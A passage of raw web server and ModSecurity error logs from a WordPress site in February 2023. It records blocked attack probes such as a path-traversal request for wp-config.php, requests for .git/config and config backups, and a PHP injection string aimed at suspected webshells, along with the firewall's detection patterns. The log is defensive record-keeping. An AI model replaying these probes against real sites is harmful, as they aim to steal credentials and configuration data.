"20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "Y-lkM1j-aIQd1faSLazCaQAAAME"], referer: https://www.google.com/search? [Mon Feb 13 06:24:46.479014 2023] [:error] [pid 21538:tid 140493514028800] [client 5.188.62.174:50664] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y-od_nEaOCSVyku-uJjP9QAAAMw"] [Mon Feb 13 15:04:37.347282 2023] [autoindex:error] [pid 20896:tid 140493421709056] [client 81.69.41.123:36712] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 13 15:04:38.903283 2023] [autoindex:error] [pid 20896:tid 140493480457984] [client 81.69.41.123:36714] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/01/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 13 15:04:40.292014 2023] [autoindex:error] [pid 20896:tid 140493530814208] [client 81.69.41.123:36716] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/02/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 13 15:04:41.859451 2023] [autoindex:error] [pid 20896:tid 140493564385024] [client 81.69.41.123:36718] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/03/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 13 15:04:42.932586 2023] [autoindex:error] [pid 20896:tid 140493614741248] [client 81.69.41.123:36720] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/04/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 13 15:04:43.950122 2023] [autoindex:error] [pid 20896:tid 140493413316352] [client 81.69.41.123:36722] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/05/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 13 15:04:45.574949 2023] [autoindex:error] [pid 21538:tid 140493505636096] [client 81.69.41.123:36726] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/06/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 13 15:04:49.180719 2023] [autoindex:error] [pid 20897:tid 140493614741248] [client 81.69.41.123:36728] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/07/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 13 15:04:50.834371 2023] [autoindex:error] [pid 21538:tid 140493539206912] [client 81.69.41.123:36730] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/08/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 13 15:04:53.406599 2023] [autoindex:error] [pid 20896:tid 140493488850688] [client 81.69.41.123:36734] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/09/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 13 15:04:54.504131 2023] [autoindex:error] [pid 21538:tid 140493430101760] [client 81.69.41.123:36736] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/10/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 13 15:04:56.188446 2023] [autoindex:error] [pid 20896:tid 140493505636096] [client 81.69.41.123:36742] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/11/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 13 15:04:57.134397 2023] [autoindex:error] [pid 20898:tid 140493497243392] [client 81.69.41.123:36744] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/12/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 13 15:04:58.471487 2023] [autoindex:error] [pid 20898:tid 140493606348544] [client 81.69.41.123:36746] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/01/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 13 15:05:00.530288 2023] [autoindex:error] [pid 21538:tid 140493572777728] [client 81.69.41.123:36748] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/02/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 14 17:33:09.191343 2023] [autoindex:error] [pid 25584:tid 140035630282496] [client 192.185.2.22:52488] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/sitemaps/index.php [Tue Feb 14 22:04:51.835126 2023] [autoindex:error] [pid 25584:tid 140035638675200] [client 43.130.131.198:33476] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/02/14 23:11:08 [error] 25540#25540: *1441443 access forbidden by rule, client: 45.61.186.239, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Wed Feb 15 11:12:58.870226 2023] [:error] [pid 24279:tid 139888687048448] [client 152.89.196.13:45004] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/wp-editor_taksonomy.php"] [unique_id "Y-0EigCOrGQ5kivzi8aQfgAAAII"] [Wed Feb 15 15:18:16.784738 2023] [:error] [pid 24279:tid 139888670263040] [client 152.89.196.13:56048] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/system-reboot.php"] [unique_id "Y-0-CACOrGQ5kivzi8aU8QAAAIQ"] [Thu Feb 16 10:36:27.391858 2023] [:error] [pid 24743:tid 139679684867840] [client 173.252.107.12:57056] [client 173.252.107.12] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-524287"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Y-5Ne9DFmMvORb2wkRRiTwAAAMc"] 2023/02/17 08:04:14 [error] 6838#6838: *1564530 access forbidden by rule, client: 192.42.116.213, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/02/17 08:04:15 [error] 6837#6837: *1564532 access forbidden by rule, client: 171.25.193.25, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/02/17 08:04:15 [error] 6838#6838: *1564533 access forbidden by rule, client: 45.139.122.241, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/02/17 08:04:16 [error] 6837#6837: *1564536 access forbidden by rule, client: 185.220.101.12, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Feb 17 11:21:19.860797 2023] [autoindex:error] [pid 6978:tid 140408109590272] [client 160.153.153.161:36218] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/pomo/index.php [Fri Feb 17 18:53:53.003455 2023] [autoindex:error] [pid 6980:tid 140408101197568] [client 93.157.100.49:53356] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/2023/index.php [Fri Feb 17 18:53:56.143607 2023] [autoindex:error] [pid 17809:tid 140408252266240] [client 93.157.100.49:53364] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/2023/index.php [Sat Feb 18 09:54:22.294899 2023] [:error] [pid 22628:tid 140662880016128] [client 5.188.62.21:60206] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y_Dmnj7a0Qe1JPEthBKlFAAAABM"] [Sat Feb 18 09:54:22.981674 2023] [:error] [pid 22628:tid 140662888408832] [client 5.188.62.21:60208] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y_Dmnj7a0Qe1JPEthBKlFQAAABI"] [Sat Feb 18 09:54:25.012543 2023] [:error] [pid 22632:tid 140662997513984] [client 5.188.62.21:60210] [client 5.188.62.21] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y_Dmocut_zPe_1MUoXdH2wAAAIU"] [Sun Feb 19 01:20:41.007223 2023] [:error] [pid 22631:tid 140662930372352] [client 178.159.37.25:36944] [client 178.159.37.25] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "Y_G_uRGtyCl7gPnKfQXn5gAAAE0"] [Sun Feb 19 01:20:41.985923 2023] [:error] [pid 22628:tid 140662980728576] [client 178.159.37.25:36978] [client 178.159.37.25] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.inc"] [unique_id "Y_G_uT7a0Qe1JPEthBKsqAAAAAc"] [Sun Feb 19 01:20:42.024699 2023] [:error] [pid 22835:tid 140662997513984] [client 178.159.37.25:36968] [client 178.159.37.25] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/web.config"] [unique_id "Y_G_uqouYxXlIabzbSAOzgAAAMU"] [Sun Feb 19 01:20:42.065671 2023] [:error] [pid 22835:tid 140662854838016] [client 178.159.37.25:36972] [client 178.159.37.25] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "Y_G_uqouYxXlIabzbSAO0QAAANY"] 2023/02/19 11:46:01 [error] 17067#17067: *1652947 access forbidden by rule, client: 13.53.234.98, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Sun Feb 19 12:11:33.713262 2023] [:error] [pid 17109:tid 139761566074624] [client 5.188.62.140:33606] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y_JYRbAqO2dbOAae6wTu5QAAAAY"] [Sun Feb 19 12:11:33.732089 2023] [:error] [pid 17753:tid 139761682073344] [client 5.188.62.140:33608] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y_JYRVsKyjtnzOu9i0s1EwAAAME"] [Sun Feb 19 12:11:35.620293 2023] [:error] [pid 17109:tid 139761440184064] [client 5.188.62.140:33610] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y_JYR7AqO2dbOAae6wTu5gAAABU"] 2023/02/19 12:55:42 [error] 17068#17068: *1654771 access forbidden by rule, client: 13.53.234.98, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/02/20 14:19:44 [error] 6470#6470: *1697941 access forbidden by rule, client: 13.49.229.20, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/02/20 14:23:49 [error] 6471#6471: *1698026 access forbidden by rule, client: 13.49.229.20, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Feb 20 17:24:23.337882 2023] [autoindex:error] [pid 6507:tid 140334340228864] [client 43.153.21.229:41826] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/02/21 01:08:17 [error] 23081#23081: *1718556 access forbidden by rule, client: 109.70.100.25, server: investigacionperu.com, request: "GET /.svn/entries HTTP/1.1", host: "investigacionperu.com" 2023/02/21 01:08:23 [error] 23082#23082: *1718561 access forbidden by rule, client: 185.220.101.36, server: investigacionperu.com, request: "GET /.git/logs/HEAD HTTP/1.1", host: "investigacionperu.com" [Tue Feb 21 01:23:56.610558 2023] [autoindex:error] [pid 23136:tid 140334205945600] [client 45.134.226.30:34472] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2023/02/21 14:55:30 [error] 18799#18799: *1743818 access forbidden by rule, client: 15.156.63.249, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/02/21 14:59:01 [error] 18799#18799: *1743911 access forbidden by rule, client: 15.156.63.249, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Feb 21 20:33:57.488794 2023] [autoindex:error] [pid 18940:tid 140544709699328] [client 43.153.48.49:52166] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Feb 23 12:43:54.325463 2023] [autoindex:error] [pid 10546:tid 140290761365248] [client 103.1.221.101:45470] AH01276: Cannot 